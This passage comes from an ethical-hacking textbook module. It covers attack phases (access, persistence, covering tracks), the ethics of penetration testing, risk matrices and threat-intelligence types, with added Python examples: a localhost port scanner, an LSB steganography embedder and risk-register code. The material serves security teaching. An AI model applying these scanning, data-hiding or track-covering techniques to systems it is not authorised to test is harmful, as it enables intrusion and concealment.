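    closed = free_port()
    targets = sorted({listening, closed})
    try:
        before = tcp_connect_scan("127.0.0.1", targets)
    finally:
        srv.close()                       # the defender shuts the service down
    after = tcp_connect_scan("127.0.0.1", targets)
    return listening, closed, before, after


if __name__ == "__main__":
    listening, closed, before, after = demo()
    print(f"listening on {listening}; probed {sorted({listening, closed})}")
    print(f"open before shutdown: {before}")
    print(f"open after shutdown:  {after}")
```

The first scan reports only the listening port; after the listener is closed the same probe list comes back empty. A host firewall that silently drops the SYN instead of refusing it would make the scan hit the timeout rather than fail fast, which is the filtering behavior the paragraph above refers to.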

The most commonly used tools are vulnerability scanners, which can search for thousands of known vulnerabilities on a target network. This gives the attacker an advantage because he or she only has to find a single means of entry, while the systems professional has to secure as many vulnerabilities as possible by applying patches. Organizations that use intrusion detection systems still have to remain vigilant because attackers can and will use evasion techniques wherever possible.

Hacking Phase: Gaining Access

This is the phase in which real hacking occurs. Attackers use vulnerabilities identified during the reconnaissance and scanning phases to gain access to the target system and network. Gaining access refers to the point where the attacker obtains access to the operating system or to applications on the computer or network. The attacker can gain access at the operating system, application, or network level. Even though attackers can cause plenty of damage without gaining any access to the system, the impact of unauthorized access is catastrophic. For instance, external denial-of-service attacks can either exhaust resources or stop services from running on the target system. Attackers can stop a service by ending processes, by using a logic bomb or time bomb, or even by reconfiguring and crashing the system. Furthermore, attackers can exhaust system and network resources by consuming all outgoing communication links.

Attackers gain access to the target system locally (offline), over a LAN, or over the Internet. Examples include password cracking, stack-based buffer overflows, denial-of-service, and session hijacking. Using a technique called spoofing to exploit the system by pretending to be a legitimate user or a different system, attackers can send a data packet containing a bug to the target system in order to exploit a vulnerability. Packet flooding also breaks the availability of essential services. Smurf attacks attempt to cause users on a network to flood each other with data, making it appear as if everyone is attacking each other, and leaving the hacker anonymous.

A hacker's chances of gaining access to a target system depend on several factors such as the architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained. Once an attacker gains access to the target system, they then try to escalate privileges in order to take complete control. In the process, they also compromise the intermediate systems that are connected to it.

Hacking Phase: Maintaining Access

Maintaining access refers to the phase when the attacker tries to retain his or her ownership of the system. Once an attacker gains access to the target system with admin or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or keep a low profile and continue their exploitation. Both of these actions can cause a great amount of damage. For instance, the hacker could implement a sniffer to capture all network traffic, including Telnet and FTP (file transfer protocol) sessions with other systems, and then transmit that data wherever they please.

Attackers who choose to remain undetected remove evidence of their entry and install a backdoor or a trojan to gain repeat access. They can also install rootkits at the kernel level to gain full administrative access to the target computer. Rootkits gain access at the operating system level, while trojans gain access at the application level. Both rootkits and trojans require users to install them locally. In Windows systems, most trojans install themselves as a service and run as part of the local system with administrative access.

Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and can also use trojans to transfer usernames, passwords, and any other information stored on the system. They can maintain control over the system for a long time by closing up vulnerabilities to prevent other hackers from taking control of it, and sometimes, in the process, render some degree of protection to the system from other attacks. Attackers use the compromised system to launch further attacks.

Hacking Phase: Clearing Tracks

For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usually attempt to erase all evidence of their actions. Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. The attacker's intentions include continuing access to the victim's system, remaining unnoticed and uncaught, and deleting evidence that might lead to their own prosecution. They use utilities such as PsTools (https://docs.microsoft.com), Netcat, or trojans to erase their footprints from the system's log files. Once the trojans are in place, the attacker has most likely gained total control of the system and can execute scripts in the trojan or rootkit to replace the critical system and log files to hide their presence in the system. Attackers always cover their tracks to hide their identity.

Other techniques include steganography and tunneling. Steganography is the process of hiding data in other data, for instance, in image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Attackers can use even a small amount of extra space in the data packet's TCP and IP headers to hide information. An attacker can use the compromised system to launch new attacks against other systems or as a means of reaching another system on the network undetected. Thus, this phase of the attack can turn into another attack's reconnaissance phase. System administrators can deploy host-based IDS (intrusion detection systems) and antivirus software in order to detect trojans and other seemingly compromised files and directories. An ethical hacker must be aware of the tools and techniques that attackers deploy so that they can advocate and implement the countermeasures detailed in subsequent modules.
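Steganography in the sense used above, as an added example that is not taken from the original text: a least-significant-bit embedder and extractor in Python. The carrier is a constructed bytearray standing in for raw 8-bit pixel or audio samples (a real image file would first need decoding, which this example leaves out), the 4-byte length prefix is this example's own framing convention, and the payload string is made up.

```python
"""Least-significant-bit steganography over a constructed carrier.

Added example (not from the original text): embeds a payload one bit per
carrier sample by overwriting each sample's least significant bit, with a
32-bit length prefix so the extractor knows where to stop. The carrier is
a synthetic bytearray standing in for raw 8-bit image or audio samples;
with a real file the same loop would run over the decoded sample data.
"""


def _to_bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(carrier: bytes, payload: bytes) -> bytes:
    """Hide payload in the LSBs of carrier; raises if the carrier is too small."""
    framed = len(payload).to_bytes(4, "big") + payload   # length header + payload
    if len(framed) * 8 > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for i, bit in enumerate(_to_bits(framed)):
        out[i] = (out[i] & 0xFE) | bit                    # clear LSB, then set it
    return bytes(out)


def _read_bytes(carrier: bytes, offset_bits: int, count: int) -> bytes:
    """Reassemble count bytes from the LSBs starting at sample offset_bits."""
    out = bytearray()
    for k in range(count):
        value = 0
        for i in range(8):
            value = (value << 1) | (carrier[offset_bits + k * 8 + i] & 1)
        out.append(value)
    return bytes(out)


def extract(carrier: bytes) -> bytes:
    """Recover a payload written by embed()."""
    length = int.from_bytes(_read_bytes(carrier, 0, 4), "big")
    return _read_bytes(carrier, 32, length)


def max_sample_change(original: bytes, modified: bytes) -> int:
    """Largest per-sample difference; LSB embedding never changes a sample by more than 1."""
    return max(abs(a - b) for a, b in zip(original, modified))


def capacity_bytes(carrier: bytes) -> int:
    """Payload bytes the carrier can hold once the 4-byte length header is accounted for."""
    return len(carrier) // 8 - 4


# Constructed carrier: 1024 synthetic 8-bit samples forming a simple gradient.
CARRIER = bytes((i * 7) % 256 for i in range(1024))


if __name__ == "__main__":
    secret = b"host=10.0.0.5;user=admin"     # made-up payload
    stego = embed(CARRIER, secret)
    print("capacity:", capacity_bytes(CARRIER), "bytes")
    print("recovered:", extract(stego))
    print("max per-sample change:", max_sample_change(CARRIER, stego))
```

The cover data changes by at most one unit per sample, which is why LSB-embedded content is invisible to the eye or ear but still detectable statistically: the LSB plane of natural images is rarely as evenly distributed as one carrying encrypted or compressed payload, and comparing file hashes against a known-good copy (a host-based indicator) catches the modification outright.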

Module Flow: Ethical Hacking Concepts

An ethical hacker follows processes similar to those of a malicious hacker. The steps to gain and maintain access to a computer system are similar irrespective of the hacker's intentions. This section provides an overview of ethical hacking, why ethical hacking is necessary, the scope and limitations of ethical hacking, and the skills of an ethical hacker.

What is Ethical Hacking?

Ethical hacking is the practice of employing computer and network skills in order to assist organizations in testing their network security for possible loopholes and vulnerabilities. White Hats (also known as security analysts or ethical hackers) are the individuals or experts who perform ethical hacking. Nowadays, most organizations (such as private companies, universities, and government organizations) are hiring White Hats to assist them in enhancing their cybersecurity. They perform hacking in ethical ways, with the permission of the network or system owner and without the intention to cause harm. Ethical hackers report all vulnerabilities to the system and network owner for remediation, thereby increasing the security of an organization's information system. Ethical hacking involves the use of hacking tools, tricks, and techniques typically used by an attacker to verify the existence of exploitable vulnerabilities in system security.

Today, the term hacking is closely associated with illegal and unethical activities. There is continuing debate as to whether hacking can be ethical or not, given the fact that unauthorized access to any system is a crime. Consider the following definitions:

- The noun "hacker" refers to a person who enjoys learning the details of computer systems and stretching their capabilities.
- The verb "to hack" describes the rapid development of new programs or the reverse engineering of existing software to make it better or more efficient in new and innovative ways.
- The terms "cracker" and "attacker" refer to persons who employ their hacking skills for offensive purposes.

- The term "ethical hacker" refers to security professionals who employ their hacking skills for defensive purposes.

Most companies employ IT professionals to audit their systems for known vulnerabilities. Although this is a beneficial practice, crackers are usually more interested in using newer, lesser-known vulnerabilities, and so these by-the-numbers system audits do not suffice. A company needs someone who can think like a cracker, keep up with the newest vulnerabilities and exploits, and recognize potential vulnerabilities where others cannot. This is the role of the ethical hacker.

Ethical hackers usually employ the same tools and techniques as hackers, with the important exception that they do not damage the system. They evaluate system security, update the administrators regarding any discovered vulnerabilities, and recommend procedures for patching those vulnerabilities. The important distinction between ethical hackers and crackers is consent. Crackers attempt to gain unauthorized access to systems, while ethical hackers are always completely open and transparent about what they are doing and how they are doing it. Ethical hacking is, therefore, always legal.

Why Ethical Hacking is Necessary

As technology is growing at a faster pace, so is the growth in the risks associated with it. To beat a hacker, it is necessary to think like one! Ethical hacking is necessary as it allows an organization to counter attacks from malicious hackers by anticipating the methods they use to break into a system. Ethical hacking helps to predict various possible vulnerabilities well in advance and rectify them without incurring any kind of outside attack. As hacking involves creative thinking, vulnerability testing and security audits alone cannot ensure that the network is secure. To achieve security, organizations must implement a "defense-in-depth" strategy by penetrating their networks to estimate and expose vulnerabilities.
Reasons why organizations recruit ethical hackers

- To prevent hackers from gaining access to the organization's information systems
- To uncover vulnerabilities in systems and explore their potential as a security risk
- To analyze and strengthen an organization's security posture, including policies, network protection infrastructure, and end-user practices
- To provide adequate preventive measures in order to avoid security breaches
- To help safeguard the customer data
- To enhance security awareness at all levels in a business
An ethical hacker's evaluation of a client's information system security seeks to answer three basic questions:

1. What can an attacker see on the target system?
Normal security checks by system administrators will often overlook vulnerabilities. The ethical hacker has to think about what an attacker might see during the reconnaissance and scanning phases of an attack.

2. What can an intruder do with that information?
The ethical hacker must discern the intent and purpose behind attacks to determine appropriate countermeasures. During the gaining-access and maintaining-access phases of an attack, the ethical hacker needs to be one step ahead of the hacker in order to provide adequate protection.

3. Are the attackers' attempts being noticed on the target systems?
Sometimes attackers will try to breach a system for days, weeks, or even months. Other times they will gain access but will wait before doing anything damaging. Instead, they take the time to assess the potential use of exposed information. During the reconnaissance and covering-tracks phases, the ethical hacker should notice and stop the attack.

After carrying out attacks, hackers may clear their tracks by modifying log files and creating backdoors, or by deploying trojans. Ethical hackers must investigate whether such activities have been recorded and what preventive measures have been taken. This not only provides them with an assessment of the attacker's proficiency but also gives them insight into the existing security measures of the system being evaluated. The entire process of ethical hacking and subsequent patching of discovered vulnerabilities depends on questions such as:
- What is the organization trying to protect?
- Against whom or what are they trying to protect it?
- Are all the components of the information system adequately protected, updated, and patched?
- How much time, effort, and money is the client willing to invest to gain adequate protection?
- Do the information security measures comply with industry and legal standards?
Sometimes, in order to save on resources or prevent further discovery, the client might decide to end the evaluation after the first vulnerability is found; therefore, it is important that the ethical hacker and the client work out a suitable framework for investigation beforehand. The client must be convinced of the importance of these security exercises through concise descriptions of what is happening and what is at stake. The ethical hacker must also remember to convey to the client that it is never possible to guard systems completely, but that they can always be improved.

Scope and Limitations of Ethical Hacking

Security experts broadly categorize computer crimes into two categories: crimes facilitated by a computer and those in which the computer is the target.

Ethical hacking is a structured and organized security assessment, usually as part of a penetration test or security audit, and is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices. It is used to identify risks and highlight remedial actions. It is also used to reduce Information and Communications Technology (ICT) costs by resolving vulnerabilities.

Ethical hackers determine the scope of the security assessment according to the client's security concerns. Many ethical hackers are members of a "Tiger Team." A tiger team works together to perform a full-scale test covering all aspects of the network, as well as physical and system intrusion.

An ethical hacker should know the penalties of unauthorized hacking into a system. No ethical hacking activities associated with a network-penetration test or security audit should begin before receiving a signed legal document from the target organization giving the ethical hacker express permission to perform the hacking activities. Ethical hackers must be judicious with their hacking skills and recognize the consequences of misusing those skills.

The ethical hacker must follow certain rules to fulfill their ethical and moral obligations. They must do the following:

- Gain authorization from the client and have a signed contract giving the tester permission to perform the test.
- Maintain confidentiality when performing the test and follow a Nondisclosure Agreement (NDA) with the client for the confidential information disclosed during the test. The information gathered might contain sensitive information, and the ethical hacker must not disclose any information about the test or the confidential company data to a third party.
- Perform the test up to but not beyond the agreed-upon limits. For example, ethical hackers should perform DoS attacks only if they have previously agreed upon this with the client. Loss of revenue, goodwill, and worse consequences could befall an organization whose servers or applications are unavailable to customers because of the testing.
The following steps provide a framework for performing a security audit of an organization, which will help in ensuring that the test is organized, efficient, and ethical:

1. Talk to the client and discuss the needs to be addressed during the testing
2. Prepare and sign NDA documents with the client
3. Organize an ethical hacking team and prepare the schedule for testing
4. Conduct the test
5. Analyze the results of the testing and prepare a report
6. Present the report findings to the client

However, there are limitations too. Unless the businesses first know what they are looking for and why they are hiring an outside vendor to hack their systems in the first place, chances are there would not be much to gain from the experience. An ethical hacker, thus, can only help the organization to better understand its security system. It is up to the organization to place the right safeguards on the network.

Skills of an Ethical Hacker

It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills needed to be a good ethical hacker are discussed below:

Technical Skills
- In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh
- In-depth knowledge of networking concepts, technologies, and related hardware and software
- A computer expert adept at technical domains
- Knowledge of security areas and related issues
- High technical knowledge of how to launch sophisticated attacks

Non-Technical Skills
- The ability to quickly learn and adapt to new technologies
- A strong work ethic and good problem-solving and communication skills
- Commitment to an organization's security policies
- An awareness of local standards and laws
Module Flow: Information Security Controls

Information security controls prevent the occurrence of unwanted events and reduce risk to the organization's information assets. The basic security concepts critical to information on the Internet are confidentiality, integrity, and availability; the concepts related to the persons accessing the information are authentication, authorization, and non-repudiation. Information is the greatest asset of an organization. It must be secured using various policies, creating awareness, employing security mechanisms, or by other means.

This section deals with Information Assurance (IA), defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management, and AI and ML concepts.

Information Assurance (IA)

IA refers to the assurance of the integrity, availability, confidentiality, and authenticity of information and information systems during the usage, processing, storage, and transmission of information. Security experts accomplish information assurance with the help of physical, technical, and administrative controls. Information Assurance and Information Risk Management (IRM) ensure that only authorized personnel access and use information. This helps in achieving information security and business continuity.

Some of the processes that help in achieving information assurance include:

- Developing local policy, process, and guidance in such a way as to maintain the information systems at an optimum security level
- Designing a network and user authentication strategy: Designing a secure network ensures the privacy of user records and other information on the network. Implementing an effective user authentication strategy secures the information system's data
- Identifying network vulnerabilities and threats: Vulnerability assessments outline the security posture of the network. Performing vulnerability assessments in search of network vulnerabilities and threats helps to take the proper measures to overcome them
- Identifying problems and resource requirements
- Creating a plan for identified resource requirements
- Applying appropriate information assurance controls
- Performing the Certification and Accreditation (C&A) process of information systems helps to trace vulnerabilities and implement safety measures to nullify them
- Providing information assurance training to all personnel in federal and private organizations brings among them an awareness of information technology

Defense-in-Depth

Defense-in-depth is a security strategy in which security professionals use several protection layers throughout an information system. This strategy uses the military principle that it is more difficult for an enemy to defeat a complex and multi-layered defense system than to penetrate a single barrier. Defense-in-depth helps to prevent direct attacks against an information system and its data because a break in one layer only leads the attacker to the next layer. If a hacker gains access to a system, defense-in-depth minimizes any adverse impact and gives administrators and engineers time to deploy new or updated countermeasures to prevent recurrence of the intrusion.

Figure 1.3: Defense-in-Depth Layers

What is Risk?

Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions. Alternatively, risk can also be:

- The probability of the occurrence of a threat or an event that will damage, cause loss to, or have other negative impacts on the organization, either from internal or external liabilities.
- The possibility of a threat acting upon an internal or external vulnerability and causing harm to a resource.
- The product of the likelihood that an event will occur and the impact that the event might have on an information technology asset.

The relation between Risk, Threats, Vulnerabilities, and Impact is as follows:

RISK = Threats x Vulnerabilities x Impact

The impact of an event on an information asset is the product of the vulnerability in the asset and the asset's value to its stakeholders. IT risk can thus be expanded to:

RISK = Threat x Vulnerability x Asset Value

In fact, the risk is the combination of the following two factors:

- The probability of the occurrence of an adverse event
- The consequence of the adverse event

Risk Level

Risk level is an assessment of the resulting impact on the network. Various methods exist to differentiate the risk levels depending on the risk frequency and severity. One of the common methods used to classify risks is to develop a two-dimensional matrix.

Working out the frequency or probability of an incident happening (likelihood) and its possible consequences is necessary to analyze risks. This is referred to as the level of risk. Risk can be represented and calculated using the following formula:

Level of Risk = Consequence x Likelihood

Risks are categorized into different levels according to their estimated impact on the system. Primarily, there are four risk levels, which include extreme, high, medium, and low levels. Remember that control measures may decrease the level of a risk, but do not always entirely eliminate the risk.

Risk Level        | Consequence                | Action
Extreme or High   | Serious or imminent danger | Immediate measures are required to combat the risk; identify and impose controls to reduce the risk to a reasonably low level
Medium            | Moderate danger            | Immediate action is not required, but action should be implemented quickly; implement controls to reduce the risk to a reasonably low level as soon as possible
Low               | Negligible danger          | Take preventive steps to mitigate the effects of risk

Table 1.1: Risk Levels

Risk Matrix

The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact. It is the graphical representation of risk severity and the extent to which the controls can or will mitigate it. The risk matrix is one of the simplest processes to use for increased visibility of risk; it contributes to the management's decision-making capability. The risk matrix defines various levels of risk and categorizes them as the product of negative probability and negative severity. Although there are many standard risk matrices, individual organizations must create their own.

[Risk matrix: rows are probability levels (Very High, High, Equal, Low, Very Low); columns are consequence levels, the highest being Major and Severe; each cell holds the resulting risk level (Low, Medium, High, or Extreme). Recoverable cells: Very High Probability x Major = Extreme, Very High Probability x Severe = Extreme, High Probability x Major = High, High Probability x Severe = Extreme.]

The above table is the graphical representation of a risk matrix, which is used to visualize and compare risks. It combines the two dimensions of risk (likelihood and consequence) into a single level and is a simple way of analyzing them.

- Likelihood: The chance of the risk occurring
- Consequence: The severity of a risk event that occurs

Note: This is an example of a risk matrix. Organizations must create individual risk matrices based on their business needs.
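The formulas and tables above can be applied mechanically to a risk register. The following is an added worked example (not code from the book or from EC-Council): it implements RISK = Threat x Vulnerability x Asset Value, looks up Level of Risk = Consequence x Likelihood in a matrix, prioritizes a register, maps each level to the action in Table 1.1, and shows that a control lowers but does not necessarily eliminate a risk. The matrix, the 0..1 scales for threat and vulnerability, and the register entries are assumptions constructed for the example, not the book's own matrix.

```python
"""Risk levels and a risk matrix applied to a small risk register.

Added example: RISK = Threat x Vulnerability x Asset Value and
Level of Risk = Consequence x Likelihood (looked up in a matrix), then a
prioritized register and the residual risk after a control is applied.
"""
from dataclasses import dataclass, replace

LIKELIHOOD = ["very_low", "low", "equal", "high", "very_high"]
CONSEQUENCE = ["insignificant", "minor", "moderate", "major", "severe"]
LEVELS = ["low", "medium", "high", "extreme"]

# Constructed matrix (an assumption for this example, not the book's table);
# rows = likelihood (very_low .. very_high), columns = consequence.
MATRIX = [
    ["low",    "low",    "low",    "medium",  "high"],
    ["low",    "low",    "medium", "medium",  "high"],
    ["low",    "medium", "medium", "high",    "high"],
    ["medium", "medium", "high",   "high",    "extreme"],
    ["medium", "high",   "high",   "extreme", "extreme"],
]

# Actions per Table 1.1 (extreme and high share one row there).
ACTION = {
    "extreme": "immediate measures; impose controls to reduce risk to a reasonably low level",
    "high": "immediate measures; impose controls to reduce risk to a reasonably low level",
    "medium": "action not immediate, but implement controls quickly",
    "low": "take preventive steps to mitigate the effects",
}


@dataclass(frozen=True)
class Risk:
    name: str
    likelihood: str        # one of LIKELIHOOD
    consequence: str       # one of CONSEQUENCE
    threat: float          # 0..1, chance the threat acts (assumed scale)
    vulnerability: float   # 0..1, how exploitable the weakness is (assumed scale)
    asset_value: float     # relative value of the asset to its stakeholders


def quantitative_risk(r: Risk) -> float:
    """RISK = Threat x Vulnerability x Asset Value."""
    return r.threat * r.vulnerability * r.asset_value


def risk_level(likelihood: str, consequence: str) -> str:
    """Level of Risk = Consequence x Likelihood, resolved through the matrix."""
    return MATRIX[LIKELIHOOD.index(likelihood)][CONSEQUENCE.index(consequence)]


def treat(r: Risk, likelihood_steps: int = 0, consequence_steps: int = 0) -> Risk:
    """Residual risk after a control: the control lowers likelihood and/or
    consequence by some steps but never below the lowest band, so the risk
    is reduced rather than eliminated."""
    li = max(0, LIKELIHOOD.index(r.likelihood) - likelihood_steps)
    ci = max(0, CONSEQUENCE.index(r.consequence) - consequence_steps)
    return replace(r, likelihood=LIKELIHOOD[li], consequence=CONSEQUENCE[ci])


def prioritize(register):
    """Order by qualitative level first, then by the quantitative score."""
    return sorted(
        register,
        key=lambda r: (LEVELS.index(risk_level(r.likelihood, r.consequence)),
                       quantitative_risk(r)),
        reverse=True,
    )


def report(register):
    """(name, level, score, required action) rows in priority order."""
    rows = []
    for r in prioritize(register):
        lvl = risk_level(r.likelihood, r.consequence)
        rows.append((r.name, lvl, round(quantitative_risk(r), 2), ACTION[lvl]))
    return rows


# Constructed register (sample data, not from the book)
REGISTER = [
    Risk("unpatched internet-facing VPN appliance", "high", "severe", 0.8, 0.9, 10),
    Risk("phishing of finance staff", "very_high", "moderate", 0.9, 0.6, 8),
    Risk("lost unencrypted laptop", "equal", "major", 0.3, 0.5, 6),
    Risk("guest Wi-Fi denial of service", "low", "minor", 0.4, 0.7, 1),
]

if __name__ == "__main__":
    for name, lvl, score, action in report(REGISTER):
        print(f"{lvl:8} {score:6.2f}  {name}: {action}")
    # Patching and restricting exposure drops likelihood two bands, yet the
    # residual level is still "high" because the consequence is unchanged.
    patched = treat(REGISTER[0], likelihood_steps=2)
    print("residual:", risk_level(patched.likelihood, patched.consequence))
```

Sorting on the qualitative level first and the numeric score second keeps the matrix as the authoritative ranking while still separating risks that share a band.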

Risk Management

Risk management is the process of identifying, assessing, responding to, and implementing the activities that control how the organization manages the potential effects of risk. It has a prominent place throughout the security life cycle and is a continuous and increasingly complex process. The types of risks vary from organization to organization, but the act of preparing a risk management plan is common to all organizations.

Risk Management Objectives

- Identify potential risks: this is the main objective of risk management
- Identify the impact of risks and help the organization develop better risk management strategies and plans
- Prioritize the risks, depending on the impact or severity of the risk, and use established risk management methods, tools, and techniques to assist in this task
- Understand and analyze the risks and report identified risk events
- Control the risk and mitigate its effect
- Create awareness among the security staff and develop strategies and plans for lasting risk management

Risk management is a continuous process performed by achieving goals at every phase. It helps reduce and maintain risk at an acceptable level utilizing a well-defined and actively employed security program. This process is applied in all stages of the organization, for example, to specific network locations in both strategic and operational contexts.

The four key steps commonly termed as risk management phases are:

- Risk Identification
- Risk Assessment
- Risk Treatment
- Risk Tracking and Review

Every organization should follow the above steps while performing the risk management process.

Risk Identification

The initial step of the risk management plan. Its main aim is to identify the risks, including the sources, causes, and consequences of the internal and external risks affecting the security of the organization, before they cause harm. The risk identification process depends on the skill set of the people, and it differs from one organization to another.

Risk Assessment

This phase assesses the organization's risks and estimates the likelihood and impact of those risks. Risk assessment is an ongoing iterative process that assigns priorities for risk mitigation and implementation plans, which in turn help to determine the quantitative and qualitative value of risk. Every organization should adopt a risk evaluation process in order to detect, prioritize, and remove risks.

The risk assessment determines the kind of risks present, their likelihood and severity, and the priorities and plans for risk control. Organizations perform a risk assessment when they identify a hazard but are not able to control it immediately. A risk assessment is followed by a regular update of all information facilities.

Risk Treatment

Risk treatment is the process of selecting and implementing appropriate controls on the identified risks in order to modify them. The risk treatment method addresses and treats the risks according to their severity level. Decisions made in this phase are based on the results of a risk assessment. The purpose of this step is to identify treatments for the risks that fall outside the department's risk tolerance and provide an understanding of the level of risk with controls and treatments. It identifies the priority order in which individual risks should be treated, monitored, and reviewed. The following information is needed before treating the risk:

- The appropriate method of treatment
- The people responsible for the treatment
- The costs involved
- The benefits of treatment
- The likelihood of success
- Ways to measure and assess the treatment
Risk Tracking and Review

An effective risk management plan requires a tracking and review structure to ensure effective identification and assessment of the risks as well as the use of appropriate controls and responses. The tracking and review process should determine the measures and procedures adopted and ensure that the information gathered to perform the assessment was appropriate. The review phase evaluates the performance of the implemented risk management strategies. Performing regular inspections of policies and standards, as well as regularly reviewing them, helps to identify the opportunities for improvement. Further, the monitoring process ensures that there are appropriate controls in place for the organization's activities and that all procedures are understood and followed.

Cyber Threat Intelligence

According to the Oxford dictionary, a threat is defined as "the possibility of a malicious attempt to damage or disrupt a computer network or system." A threat is a potential occurrence of an undesired event that can eventually damage and interrupt the operational and functional activities of an organization. A threat can affect the integrity and availability factors of an organization. The impact of threats is very great and may affect the state of the physical IT assets in an organization. The existence of threats may be accidental, intentional, or due to the impact of some action.

Cyber threat intelligence, usually known as CTI, is the collection and analysis of information about threats and adversaries and the drawing up of patterns that provide an ability to make knowledgeable decisions for preparedness, prevention, and response actions against various cyberattacks. It is the process of recognizing or discovering any "unknown threats" that an organization may face so that necessary defense mechanisms can be applied to avoid such occurrences. It involves collecting, researching, and analyzing trends and technical developments in the field of cyber threats (including cybercrime, hacktivism, and espionage). Any knowledge about threats that results in an organization's planning and decision-making to handle it is a piece of threat intelligence. The main aim of CTI is to make the organization aware of existing or emerging threats and prepare them to develop a proactive cybersecurity posture in advance of exploitation. This process, where unknown threats are converted into possibly known ones, helps to anticipate the attack before it can happen, and ultimately results in a better and more secure system. Thus, threat intelligence is useful in achieving secure data sharing and global transactions among organizations.

Threat intelligence processes can be used to identify the risk factors that are responsible for malware attacks, SQL injections, web application attacks, data leaks, phishing, denial-of-service attacks, and other attacks. Such risks, after being filtered out, can be put on a checklist and handled appropriately.

Threat intelligence is beneficial for an organization to handle cyber threats with effective planning and execution. Along with a thorough analysis of the threat, CTI also strengthens the organization's defense system, creates awareness about impending risks, and aids in responding against such risks.
Types of Threat Intelligence

Threat intelligence is contextual information that describes threats and guides organizations in making various business decisions. It is extracted from a huge collection of sources and information. It provides operational insight by looking outside the organization and issuing alerts on evolving threats to the organization. For the better management of information that is collected from different sources, it is important to subdivide threat intelligence into different types. This subdivision is performed based on the consumers and goals of the intelligence. From the perspective of consumption, threat intelligence is divided into four different types. They are, namely, strategic, tactical, operational, and technical threat intelligence. These four types differ in terms of data collection, data analysis, and intelligence consumption.

Strategic Threat Intelligence

Strategic threat intelligence provides high-level information regarding cybersecurity posture, threats, details about the financial impact of various cyber activities, attack trends, and the impact of high-level business decisions. This information is consumed by the high-level executives and management of the organization, such as IT management and the CISO. It helps the management to identify current cyber risks, unknown future risks, threat groups, and attribution of breaches. The intelligence obtained provides a risk-based view that mainly focuses on high-level concepts of risks and their probability. It mainly deals with long-term issues and provides real-time alerts for threats to the organization's critical assets, such as IT infrastructure, employees, customers, and applications. This intelligence is used by the management to make strategic business decisions and to analyze their effect. Based on the analysis, the management can allocate sufficient budget and staff to protect critical IT assets and business processes.

Strategic threat intelligence is generally in the form of a report that mainly focuses on high-level business strategies. Since the characteristic of strategic threat intelligence is preeminent, the data collection also relates to high-level sources and requires highly skilled professionals to extract information. This intelligence is collected from sources such as OSINT, CTI vendors, and ISAOs and ISACs.

Strategic threat intelligence helps organizations identify any similar past incidents, their intentions, and any attributes that might identify the attacking adversaries, why the organization is within the scope of the attack, major attack trends, and how to reduce the risk level.

Generally, strategic threat intelligence includes the following information:

- The financial impact of cyber activity
- Attribution for intrusions and data breaches
- Threat actors and attack trends
- The threat landscape for various industry sectors
- Statistical information on data breaches, data theft, and malware
- Geopolitical conflicts involving various cyberattacks
- Information on how adversary TTPs change over time
- Industry sectors that might be impacted due to high-level business decisions
Tactical Threat Intelligence

Tactical threat intelligence plays a major role in protecting the resources of the organization. It provides information related to the TTPs used by threat actors (attackers) to perform attacks. Tactical threat intelligence is consumed by cybersecurity professionals such as IT service managers, security operations managers, network operations center (NOC) staff, administrators, and architects. It helps the cybersecurity professionals understand how the adversaries are expected to perform their attack on the organization, identify the information leakage from the organization, and assess the technical capabilities and goals of the attackers along with the attack vectors. Using tactical threat intelligence, security personnel develop detection and mitigation strategies beforehand through procedures such as updating security products with identified indicators and patching vulnerable systems.

The collection sources for tactical threat intelligence include campaign reports, malware, incident reports, attack group reports, and human intelligence, among other information. This intelligence is generally obtained by reading white or technical papers, communicating with other organizations, or purchasing intelligence from third parties. It includes highly technical information on topics such as malware, campaigns, techniques, and tools in the form of forensic reports.

Tactical threat intelligence provides day-to-day operational support by helping analysts assess various security incidents related to events, investigations, and other activities. It also guides the high-level executives of the organizations in making strategic business decisions.
Operational Threat Intelligence

Operational threat intelligence provides information about specific threats against the organization. It provides contextual information about security events and incidents that help defenders disclose potential risks, provide greater insight into attacker methodologies, identify past malicious activities, and perform investigations on malicious activity in a more efficient way. It is consumed by security managers or heads of incident response, network defenders, security forensics, and fraud detection teams. It helps organizations to understand the possible threat actors and their intention, capability, and opportunity to attack vulnerable IT assets and the impact of a successful attack. In many cases, only government organizations can collect this type of intelligence. However, doing so helps IR and forensic teams to deploy security assets to identify and stop upcoming attacks, improve early-stage attack detection capability, and reduce an attack's damage to IT assets.

Operational threat intelligence is generally collected from sources such as humans, social media, and chat rooms; it may also be collected from the real-world activities and events that result in cyberattacks. Operational threat intelligence is obtained by analyzing human behavior, threat groups, and by similar means. This information helps to predict future attacks and thus enhances incident response plans and mitigation strategies. Operational threat intelligence generally appears as a report that contains identified malicious activities, recommended courses of action, and warnings of emerging attacks.
Technical Threat Intelligence

Technical threat intelligence provides information about resources an attacker uses to perform an attack; this includes command and control channels, tools, and other items. It has a shorter lifespan compared to tactical threat intelligence and mainly focuses on a specific IoC. It provides rapid distribution and response to threats. For example, a piece of malware used to perform an attack is tactical threat intelligence, whereas the details related to the specific implementation of the malware come under technical threat intelligence. Other examples of technical threat intelligence include the specific IP addresses and domains used by malicious endpoints, phishing email headers, and hash checksums of malware, among others. Technical threat intelligence is consumed by SOC staff and IR teams.

The indicators of technical threat intelligence are collected from active campaigns, attacks that are performed on other organizations, or data feeds provided by external third parties. These indicators are generally collected as part of investigations of attacks performed on various organizations. This information helps security professionals add the identified indicators to defensive systems such as IDS and IPS, firewalls, and endpoint security systems, thereby enhancing the detection mechanisms used to identify the attacks at an early stage. It also helps them identify malicious traffic and IP addresses suspected of spreading malware and spam emails. This intelligence is directly fed into the security devices in digital format to block and identify malicious inbound and outbound traffic entering the organization's network.
